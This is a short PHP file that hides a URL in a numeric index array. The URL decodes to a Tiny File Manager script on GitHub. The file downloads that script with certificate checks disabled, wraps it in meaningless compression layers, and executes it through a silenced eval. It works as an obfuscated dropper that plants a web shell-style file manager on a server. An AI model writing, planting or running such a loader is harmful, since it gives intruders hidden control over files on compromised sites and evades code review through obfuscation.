<?php

 $characters = array_merge(range('a', 'z'), range('A', 'Z'), range('0', '9'), ['.', ':', '/', '_', '-']);
 $indexArray = [7,19,19,15,18,63,64,64,17,0,22,62,6,8,19,7,20,1,62,2,14,12,64,15,17,0,18,0,19,7,12,0,13,8,64,19,8,13,24,5,8,11,4,12,0,13,0,6,4,17,64,17,4,5,18,64,7,4,0,3,18,64,12,0,18,19,4,17,64,19,8,13,24,5,8,11,4,12,0,13,0,6,4,17,62,15,7,15];
 $decodedString = '';
foreach ($indexArray as $index) {
    $decodedString .= $characters[$index];
}
 $url = $decodedString;

function fetchContent($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    $content = curl_exec($ch);
    curl_close($ch);
    return gzdeflate(gzcompress(gzdeflate(gzcompress(gzdeflate(gzcompress(gzdeflate(gzcompress($content))))))));
}

@eval("?>".gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(fetchContent($url)))))))));

?>
